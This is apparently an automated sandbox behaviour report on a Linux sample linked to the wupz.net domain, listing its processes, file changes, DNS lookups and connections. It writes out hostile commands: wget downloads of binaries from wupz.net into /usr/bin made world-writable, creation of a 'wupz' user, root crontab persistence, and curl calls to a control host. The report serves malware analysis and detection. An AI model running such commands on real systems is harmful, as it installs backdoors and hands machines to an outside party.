Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /var/spool/cron/crontabs/root
Malicious functions:
Gains root privileges
Launches processes:
- apt update -y
- free -m
- /usr/bin/mawk awk {print $2,$3,$4}
- curl -s https://cdn-script.wupz.net/date.php
- bash -c lsb_release -d
- /usr/bin/mawk awk {print $2}
- clear
- /usr/bin/python3.9 /usr/bin/python3 -Es /usr/bin/lsb_release -d
- sudo useradd -s /bin/bash -d /home/wupz/ -m wupz
- grep Description
- apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
- df -h
- su -c lsb_release -d
- rm -rf /tmp/apt-key-gpghome.K8CdpK9l2R
- grep load
- curl -N -s -4 --data method=eski-ts3 https://cdn-script.wupz.net/method
- mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
- curl -N -s -4 --data method=sBot-356-TekPanel https://cdn-script.wupz.net/method
- chmod 700 /tmp/apt-key-gpghome.K8CdpK9l2R
- expr 10
- /usr/lib/apt/methods/store
- bash -c source /mnt/699 <SAMPLE_FULL_PATH>
- gpgv --homedir /tmp/apt-key-gpghome.K8CdpK9l2R --keyring /tmp/apt-key-gpghome.K8CdpK9l2R/docker.asc.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.vprxKX /tmp/apt.data.ftXjeW
- apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
- gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
- curl -N -s -4 --data method=yeni-ts3 https://cdn-script.wupz.net/method
- chmod 777 /usr/bin/wupz-check
- apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
- wget -q --no-check-certificate https:/wupz.net/wupz-check -O /usr/bin/wupz-check
- crontab -
- wget -q --no-check-certificate https://wupz.net/wupz -O /usr/bin/wupz
- /usr/lib/apt/methods/https
- apt-config shell GPGV Apt::Key::gpgvcommand
- curl -N -s -4 --data request=blacklist&sip=176.100.243.133 https://cdn-script.wupz.net/index
- curl -s https://cdn-script.wupz.net/news
- curl -N -s -4 --data method=teaspeak https://cdn-script.wupz.net/method
- /usr/bin/mawk awk /^-----BEGIN/{ x = 1; }\x0a/^$/{ if (x == 1) { x = 2; }; }\x0a/^[^=-]/{ if (x == 2) { print $0; }; }\x0a/^-----END/{ x = 0; }
- /bin/sh /usr/bin/apt-key --quiet --readonly --keyring /etc/apt/keyrings/docker.asc verify --status-fd 3 /tmp/apt.sig.vprxKX /tmp/apt.data.ftXjeW
- id -u
- /usr/bin/mawk awk { ip = $1 } END { print ip }
- gpg-connect-agent -s --no-autostart GETINFO scd_running /if ${! $?} scd killscd /end
- apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
- top -bn1
- curl -N -s -4 --data method=sBot-353-Limitsiz https://cdn-script.wupz.net/method
- curl -N -s -4 --data method=sBot-353-TekPanel https://cdn-script.wupz.net/method
- date +%d
- /usr/bin/dpkg --print-foreign-architectures
- /usr/bin/mawk awk {printf \x22%.2f\x22 $(NF-2)}
- /usr/bin/mawk awk $NF==\x22/\x22{printf \x22%d/%dGB (%s)\x22 $3,$2,$5}
- curl -s -4 https://cdn-script.wupz.net/ip.php
- /usr/bin/mawk awk NR==2{printf \x22%s/%sMB (%.2f%%)\x22 $3,$2,$3*100/$2}
- date +10.%m.%Y
- useradd -s /bin/bash -d /home/wupz/ -m wupz
- /bin/sh /usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.nFocpx /tmp/apt.data.gAsHkx
- sed -e s#\x27#\x27\x22\x27\x22\x27#g
- chmod 777 /usr/bin/wupz
- gpgconf --kill all
- base64 -d
- gpg-connect-agent --no-autostart KILLAGENT
- /usr/lib/apt/methods/http
- /usr/lib/apt/methods/gpgv
Kills the following processes:
- http
- gpgv
- store
Performs operations with the file system:
Modifies file access rights:
- /home/wupz
- /home/wupz/.profile
- /home/wupz/.bash_logout
- /home/wupz/.bashrc
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/group-
- /etc/group+
- /etc/gshadow-
- /etc/gshadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /usr/bin/wupz
- /usr/bin/wupz-check
- /var/spool/cron/crontabs/tmp.tvSYY2
- /var/lib/apt/lists/partial
- /var/lib/apt/lists/auxfiles
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_InRelease
- /var/lib/apt/lists/partial/security.debian.org_debian-security_dists_bullseye-security_InRelease
- /tmp/apt-key-gpghome.K8CdpK9l2R
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages.bz2
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages.E5b0mU
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages
Modifies file owner:
- /home/wupz
- /home/wupz/.profile
- /home/wupz/.bash_logout
- /home/wupz/.bashrc
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/group-
- /etc/group+
- /etc/gshadow-
- /etc/gshadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /var/lib/apt/lists/partial
- /var/lib/apt/lists/auxfiles
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_InRelease
- /var/lib/apt/lists/partial/security.debian.org_debian-security_dists_bullseye-security_InRelease
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages.bz2
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages
Creates folders:
- /root/.config
- /root/.config/procps
- /home/wupz
- /tmp/apt-key-gpghome.K8CdpK9l2R
Deletes folders:
- /tmp/apt-key-gpghome.K8CdpK9l2R
Creates symlinks:
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /etc/shadow.lock
Creates or modifies files:
- /mnt/699
- /etc/.pwd.lock
- /etc/passwd.766
- /etc/group.766
- /etc/gshadow.766
- /etc/subuid.766
- /etc/subgid.766
- /etc/shadow.766
- /var/log/faillog
- /var/log/lastlog
- /home/wupz/.profile
- /home/wupz/.bash_logout
- /home/wupz/.bashrc
- /etc/passwd-
- /etc/passwd+
- /etc/shadow-
- /etc/shadow+
- /etc/group-
- /etc/group+
- /etc/gshadow-
- /etc/gshadow+
- /etc/subuid-
- /etc/subuid+
- /etc/subgid-
- /etc/subgid+
- /usr/bin/wupz
- /usr/bin/wupz-check
- /var/spool/cron/crontabs/tmp.tvSYY2
- /tmp/#130829 (deleted)
- /var/lib/apt/lists/lock
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.sjynYd
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.I96Eif
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.c1U3Af
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.Zp9zeh
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_InRelease
- /var/lib/apt/lists/partial/security.debian.org_debian-security_dists_bullseye-security_InRelease
- /tmp/apt.conf.rDeTIW
- /tmp/apt.sig.vprxKX
- /tmp/apt.data.ftXjeW
- /tmp/apt-key-gpghome.K8CdpK9l2R/docker.asc.gpg
- /tmp/apt-key-gpghome.K8CdpK9l2R/gpg.1.sh
- /tmp/apt.conf.sirbLv
- /tmp/apt.sig.nFocpx
- /tmp/apt.data.gAsHkx
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages.bz2
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages.E5b0mU
Deletes files:
- /mnt/699
- /etc/passwd.766
- /etc/group.766
- /etc/gshadow.766
- /etc/subuid.766
- /etc/subgid.766
- /etc/shadow.766
- /etc/shadow.lock
- /etc/passwd.lock
- /etc/group.lock
- /etc/gshadow.lock
- /etc/subuid.lock
- /etc/subgid.lock
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.sjynYd
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.I96Eif
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.c1U3Af
- /var/lib/apt/lists/partial/.apt-acquire-privs-test.Zp9zeh
- /tmp/apt-key-gpghome.K8CdpK9l2R/docker.asc.gpg
- /tmp/apt-key-gpghome.K8CdpK9l2R/gpg.1.sh
- /tmp/apt.conf.rDeTIW
- /tmp/apt.sig.vprxKX
- /tmp/apt.data.ftXjeW
Changes time of creation/access/modification of files:
- /home/wupz/.profile
- /home/wupz/.bash_logout
- /home/wupz/.bashrc
- /etc/passwd-
- /etc/shadow-
- /etc/group-
- /etc/gshadow-
- /etc/subuid-
- /etc/subgid-
- /usr/bin/wupz
- /var/spool/cron/crontabs
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_InRelease
- /var/lib/apt/lists/partial/security.debian.org_debian-security_dists_bullseye-security_InRelease
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages.bz2
- /var/lib/apt/lists/partial/download.docker.com_linux_debian_dists_bullseye_stable_binary-amd64_Packages
Network activity:
Establishes connection:
- 8.#.8.8:53
- 18#.##4.97.1:443
- (e##val)
- 18#.##4.96.1:443
- [2#####8c1:3121::1]:443
- [2#####8c1:3120::1]:443
- 18#.#14.96.1:0
- 18#.#14.97.1:0
- [2#####8c1:3121::1]:0
- [2#####8c1:3120::1]:0
- 15#.##1.246.132:80
- [2#####e42:3a::644]:80
- [2##########78f:8c00:3:db06:4200:93a1]:443
- [2##########78f:4e00:3:db06:4200:93a1]:443
- [2##########78f:7800:3:db06:4200:93a1]:443
- [2##########78f:6200:3:db06:4200:93a1]:443
- [2##########78f:fa00:3:db06:4200:93a1]:443
- [2##########78f:5a00:3:db06:4200:93a1]:443
- [2##########78f:f800:3:db06:4200:93a1]:443
- [2##########78f:5600:3:db06:4200:93a1]:443
- 3.###.206.39:443
- 3.###.206.102:443
- 3.###.206.5:443
- 3.###.206.93:443
DNS ASK:
- cd####ript.wupz.net
- wu##.net
- ww#.#upz.net
- https
- _h####.##cp.download.docker.com
- _h###.###p.security.debian.org
- _h###.##cp.deb.debian.org
- do####ad.docker.com
- de####.#ap.fastlydns.net
Sends data to the following servers:
- 18#.##4.97.1:443
- 18#.##4.96.1:443
- 15#.##1.246.132:80
- 3.###.206.39:443
Receives data from the following servers:
- 18#.##4.97.1:443
- 18#.##4.96.1:443
- 3.###.206.39:443
- 15#.##1.246.132:80
Other:
Collects OS information
Collects CPU information
Collects RAM information
Collects information about network activity
